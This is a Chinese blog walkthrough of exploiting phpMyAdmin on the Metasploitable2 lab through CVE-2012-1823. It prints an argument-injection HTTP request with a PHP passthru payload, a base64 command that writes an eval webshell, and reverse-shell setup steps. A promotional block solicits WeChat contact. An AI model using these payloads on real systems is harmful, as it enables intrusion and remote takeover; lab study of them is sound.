前言
做滲透測試的時候偶然發現,phpmyadmin少見的打法,以下就用靶場進行演示了。
0x01漏洞發現
環境搭建使用metasploitable2,可在網上搜索下載,搭建很簡單這裏不多說了。
發現phpmyadmin,如果這個時候無法登陸,且也沒有前臺的漏洞,可以繼續在這個phpmyadmin目錄下做文章。
發現setup
0x02漏洞利用
進行漏洞利用
https://juejin.cn/post/7042901479388086285
POST
/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1
Host: 192.168.48.143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phpMyAdmin=bdbb427ed9c5e8616fe90261adcfb7229d6ca189;
pma_lang=en-utf-8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
\<?php
passthru(\'id\');
die();
?\>
這裏利用的是CVE-2012-1823
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
解碼後
?-d allow_url_include=on -d auto_prepend_file=php://input
開啓allow_url_include和auto_prepend_file
其中allow_url_include可以遠程文件包含,auto_prepend_file加載php://input
其中php://input 可以讀取http entitybody中指定長度的值,由Content-Length指定長度
【----幫助網安學習,以下所有學習資料免費領!加vx:dctintin,備註 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
寫一句話木馬getshell
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >shell.php
0x03反彈shell
利用kali現成的
cp /usr/share/webshells/php/php-reverse-shell.php ./1.php
修改這個ip
修改ip
反彈shell成功,且無文件生成。
更多網安技能的在線實操練習,請點擊這裏>>